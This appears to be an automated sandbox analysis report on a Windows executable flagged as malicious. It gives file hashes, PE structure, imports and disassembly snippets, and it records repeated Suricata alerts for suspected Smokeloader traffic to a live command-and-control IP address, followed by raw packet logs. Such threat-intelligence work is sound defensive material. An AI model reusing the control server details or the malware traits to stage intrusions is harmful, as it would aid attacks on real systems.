Preview:	{"serviceContext":{"serviceActivityId":"29c80c61-4416-4fb4-bd37-c231f69ad7c8","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"29c80c61-4416-4fb4-bd37-c231f69ad7c8\|2024-10-14T08:03:47.5855618Z\|fabric_msn\|EUS2-A\|News_439"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}

C:\Users\user\AppData\Roaming\tttcvva

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	265728
Entropy (8bit):	5.865289236213907
Encrypted:	false
SSDEEP:	3072:7jbcVSAwzdpaK6AQcrI+t5wCyxF9Davc5oUCIqzpjAqMi:PbcgeKJ8/4c5oVIqzpjAqh
MD5:	91BE25F31B7891908A50DFDC9F03F2B4
SHA1:	91DB4BC09A4976DB1B9922E09F2330B48AE50338
SHA-256:	422D2CEA49B00FDC8B97B75B623006386426EC23637C53341E03D250E5FFE21B
SHA-512:	39F10CDAD12C1857378DBB262C2D124450F03DE19109F5012472D14CDBA2C1B609D16A33F136BE3175699B6747F96F4053E34072B21E4F1C8E30035B4A02E1B9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42% Antivirus: Virustotal, Detection: 38%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................U.c......q......`.......v......E.....................a......d....Rich...................PE..L....).f.................f....r.....".............@..........................`t.....<..........................................P....0r..-...........................................................................................................text...od.......f.................. ..`.rdata..F#.......$...j..............@..@.data.....p.........................@....dasu....D....q..8..................@....dedileg..... r.....................@....rsrc....-...0r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\tttcvva:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.865289236213907
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3sfCdeA1H2.exe
File size:	265'728 bytes
MD5:	91be25f31b7891908a50dfdc9f03f2b4
SHA1:	91db4bc09a4976db1b9922e09f2330b48ae50338
SHA256:	422d2cea49b00fdc8b97b75b623006386426ec23637c53341e03d250e5ffe21b
SHA512:	39f10cdad12c1857378dbb262c2d124450f03de19109f5012472d14cdba2c1b609d16a33f136be3175699b6747f96f4053e34072b21e4f1c8e30035b4a02e1b9
SSDEEP:	3072:7jbcVSAwzdpaK6AQcrI+t5wCyxF9Davc5oUCIqzpjAqMi:PbcgeKJ8/4c5oVIqzpjAqh
TLSH:	EC44088162F16C13EFB64B325E39D994363FBCA25E7572DFA100762F187B1A0A513B12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................U.c.......q.......`.......v......E........................a.......d.....Rich....................PE..L....).f...

File Icon


Icon Hash:	17694cb2b24d2117

Static PE Info

General

Entrypoint:	0x401a22
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x661F299C [Wed Apr 17 01:45:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	26a7df6d78a90bac0a71dda0842d4e4f

Entrypoint Preview

Instruction
call 00007F74D4FDE312h
jmp 00007F74D4FDAB8Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041C650h], eax
mov dword ptr [0041C64Ch], ecx
mov dword ptr [0041C648h], edx
mov dword ptr [0041C644h], ebx
mov dword ptr [0041C640h], esi
mov dword ptr [0041C63Ch], edi
mov word ptr [0041C668h], ss
mov word ptr [0041C65Ch], cs
mov word ptr [0041C638h], ds
mov word ptr [0041C634h], es
mov word ptr [0041C630h], fs
mov word ptr [0041C62Ch], gs
pushfd
pop dword ptr [0041C660h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041C654h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041C658h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041C664h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041C5A0h], 00010001h
mov eax, dword ptr [0041C658h]
mov dword ptr [0041C554h], eax
mov dword ptr [0041C548h], C0000409h
mov dword ptr [0041C54Ch], 00000001h
mov eax, dword ptr [0041B008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041B00Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000D8h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x199ec	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2723000	0x22dd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x18000	0x19c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1646f	0x16600	8e1df092712797f4ed2c63781970f1a9	False	0.8006394029329609	data	7.485220555336947	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x18000	0x2346	0x2400	1441f6878108ae7a1e880f66e9300026	False	0.3709852430555556	data	5.430377870583949	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x270121c	0x1600	9b1eaffe006746dc9f65246d77e8674e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dasu	0x271d000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dedileg	0x2722000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2723000	0x22dd0	0x22e00	a52944790072aafd6cb9097c3faac98d	False	0.3802503360215054	data	4.842357757725682	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x273b678	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x273b7a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x273dd78	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x273dea8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x2723b50	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5674307036247335
RT_ICON	0x27249f8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6376353790613718
RT_ICON	0x27252a0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6849078341013825
RT_ICON	0x2725968	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7456647398843931
RT_ICON	0x2725ed0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.512863070539419
RT_ICON	0x2728478	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6137429643527205
RT_ICON	0x2729520	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6163934426229508
RT_ICON	0x2729ea8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7553191489361702
RT_ICON	0x272a388	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.3997867803837953
RT_ICON	0x272b230	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.5036101083032491
RT_ICON	0x272bad8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.5264976958525346
RT_ICON	0x272c1a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.5484104046242775
RT_ICON	0x272c708	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.35549792531120333
RT_ICON	0x272ecb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.38133208255159473
RT_ICON	0x272fd58	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.4069672131147541
RT_ICON	0x27306e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.42109929078014185
RT_ICON	0x2730bc0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39285714285714285
RT_ICON	0x2731a68	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5537003610108303
RT_ICON	0x2732310	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6226958525345622
RT_ICON	0x27329d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6372832369942196
RT_ICON	0x2732f40	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.425422138836773
RT_ICON	0x2733fe8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4209016393442623
RT_ICON	0x2734970	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.46187943262411346
RT_ICON	0x2734e40	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.279317697228145
RT_ICON	0x2735ce8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.3664259927797834
RT_ICON	0x2736590	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.3773041474654378
RT_ICON	0x2736c58	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.3764450867052023
RT_ICON	0x27371c0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.2587136929460581
RT_ICON	0x2739768	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.27345215759849906
RT_ICON	0x273a810	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.28852459016393445
RT_ICON	0x273b198	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.32180851063829785
RT_STRING	0x2740630	0xaa	data			0.5588235294117647
RT_STRING	0x27406e0	0x600	data			0.4361979166666667
RT_STRING	0x2740ce0	0x460	data			0.45
RT_STRING	0x2741140	0x64a	data			0.4360248447204969
RT_STRING	0x2741790	0x7b4	data			0.417342799188641
RT_STRING	0x2741f48	0x6d0	data			0.4294724770642202
RT_STRING	0x2742618	0x76c	data			0.42526315789473684
RT_STRING	0x2742d88	0x606	data			0.4455252918287938
RT_STRING	0x2743390	0x7c2	data			0.42245720040281975
RT_STRING	0x2743b58	0x810	data			0.42102713178294576
RT_STRING	0x2744368	0x584	data			0.4461756373937677
RT_STRING	0x27448f0	0x74c	data			0.4234475374732334
RT_STRING	0x2745040	0x710	data			0.4303097345132743
RT_STRING	0x2745750	0x5f6	data			0.4325032765399738
RT_STRING	0x2745d48	0x88	data			0.625
RT_GROUP_CURSOR	0x273dd50	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x2740450	0x22	data			1.088235294117647
RT_GROUP_ICON	0x2730b48	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x273b600	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x272a310	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x2734dd8	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x2740478	0x1b4	data			0.5756880733944955

Imports

DLL	Import
KERNEL32.dll	ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, QueryDosDeviceA, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesW, GetConsoleFontSize, OpenJobObjectA, WritePrivateProfileStringW, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, SetStdHandle, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, MoveFileA, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, OpenFileMappingA, GetNumaProcessorNode, DeleteVolumeMountPointA, SearchPathW, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CloseHandle, CreateFileA
GDI32.dll	GetBoundsRect
ADVAPI32.dll	ClearEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T10:02:39.243661+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49736	109.175.29.39	80	TCP
2024-10-14T10:02:40.058060+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49737	109.175.29.39	80	TCP
2024-10-14T10:02:40.996326+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49738	109.175.29.39	80	TCP
2024-10-14T10:02:41.831307+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49739	109.175.29.39	80	TCP
2024-10-14T10:02:42.639282+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49740	109.175.29.39	80	TCP
2024-10-14T10:02:43.565248+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49741	109.175.29.39	80	TCP
2024-10-14T10:02:44.373465+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49742	109.175.29.39	80	TCP
2024-10-14T10:02:45.214089+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49743	109.175.29.39	80	TCP
2024-10-14T10:02:46.041902+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	109.175.29.39	80	TCP
2024-10-14T10:02:47.033837+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49745	109.175.29.39	80	TCP
2024-10-14T10:02:47.853497+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	109.175.29.39	80	TCP
2024-10-14T10:02:48.657828+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49747	109.175.29.39	80	TCP
2024-10-14T10:02:49.462699+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49748	109.175.29.39	80	TCP
2024-10-14T10:02:50.282988+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49749	109.175.29.39	80	TCP
2024-10-14T10:02:51.090176+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49750	109.175.29.39	80	TCP
2024-10-14T10:02:51.895964+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49751	109.175.29.39	80	TCP
2024-10-14T10:02:52.778542+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49752	109.175.29.39	80	TCP
2024-10-14T10:02:53.595039+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49753	109.175.29.39	80	TCP
2024-10-14T10:02:54.432535+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49754	109.175.29.39	80	TCP
2024-10-14T10:02:55.356666+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49755	109.175.29.39	80	TCP
2024-10-14T10:02:56.161080+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49756	109.175.29.39	80	TCP
2024-10-14T10:02:56.967830+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49757	109.175.29.39	80	TCP
2024-10-14T10:02:57.802218+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49758	109.175.29.39	80	TCP
2024-10-14T10:02:58.603169+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49759	109.175.29.39	80	TCP
2024-10-14T10:02:59.501084+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49760	109.175.29.39	80	TCP
2024-10-14T10:03:00.325141+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49761	109.175.29.39	80	TCP
2024-10-14T10:03:01.241528+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49762	109.175.29.39	80	TCP
2024-10-14T10:03:02.205412+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49763	109.175.29.39	80	TCP
2024-10-14T10:03:03.013839+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49764	109.175.29.39	80	TCP
2024-10-14T10:03:03.820532+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49765	109.175.29.39	80	TCP
2024-10-14T10:03:04.823196+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49766	109.175.29.39	80	TCP
2024-10-14T10:03:05.614746+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49767	109.175.29.39	80	TCP
2024-10-14T10:03:06.417805+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49769	109.175.29.39	80	TCP
2024-10-14T10:03:07.311724+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49770	109.175.29.39	80	TCP
2024-10-14T10:03:08.128601+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49772	109.175.29.39	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 10:02:38.448226929 CEST	49736	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:38.453684092 CEST	80	49736	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:38.453769922 CEST	49736	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:38.453902006 CEST	49736	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:38.453923941 CEST	49736	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:38.458955050 CEST	80	49736	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:38.458993912 CEST	80	49736	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:39.243119955 CEST	80	49736	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:39.243606091 CEST	80	49736	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:39.243660927 CEST	49736	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:39.244494915 CEST	49736	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:39.247066975 CEST	49737	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:39.249277115 CEST	80	49736	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:39.252232075 CEST	80	49737	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:39.252372026 CEST	49737	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:39.252496958 CEST	49737	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:39.252541065 CEST	49737	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:39.257407904 CEST	80	49737	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:39.257464886 CEST	80	49737	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:40.057665110 CEST	80	49737	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:40.057750940 CEST	80	49737	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:40.058059931 CEST	49737	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:40.058166027 CEST	49737	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:40.060461044 CEST	49738	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:40.063155890 CEST	80	49737	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:40.065314054 CEST	80	49738	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:40.065385103 CEST	49738	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:40.065501928 CEST	49738	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:40.065593004 CEST	49738	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:40.070281029 CEST	80	49738	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:40.070472956 CEST	80	49738	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:40.996191025 CEST	80	49738	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:40.996238947 CEST	80	49738	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:40.996325970 CEST	49738	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.000817060 CEST	49738	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.006038904 CEST	80	49738	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:41.031969070 CEST	49739	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.037185907 CEST	80	49739	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:41.037493944 CEST	49739	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.037493944 CEST	49739	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.037493944 CEST	49739	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.042339087 CEST	80	49739	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:41.042542934 CEST	80	49739	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:41.830756903 CEST	80	49739	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:41.831177950 CEST	80	49739	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:41.831306934 CEST	49739	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.831306934 CEST	49739	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.833592892 CEST	49740	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.836582899 CEST	80	49739	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:41.838510990 CEST	80	49740	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:41.838607073 CEST	49740	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.838699102 CEST	49740	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.838699102 CEST	49740	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:41.843863964 CEST	80	49740	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:41.843905926 CEST	80	49740	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:42.637752056 CEST	80	49740	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:42.639051914 CEST	80	49740	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:42.639281988 CEST	49740	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:42.639281988 CEST	49740	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:42.642024040 CEST	49741	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:42.644653082 CEST	80	49740	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:42.647506952 CEST	80	49741	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:42.647579908 CEST	49741	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:42.647681952 CEST	49741	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:42.647697926 CEST	49741	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:42.652764082 CEST	80	49741	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:42.652795076 CEST	80	49741	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:43.564790964 CEST	80	49741	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:43.564973116 CEST	80	49741	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:43.565248013 CEST	49741	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:43.568638086 CEST	49741	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:43.574096918 CEST	80	49741	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:43.580332041 CEST	49742	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:43.585764885 CEST	80	49742	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:43.585872889 CEST	49742	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:43.586003065 CEST	49742	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:43.586028099 CEST	49742	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:02:43.591243029 CEST	80	49742	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:43.591281891 CEST	80	49742	109.175.29.39	192.168.2.4
Oct 14, 2024 10:02:44.373192072 CEST	80	49742	109.175.29.39	192.168.2.4
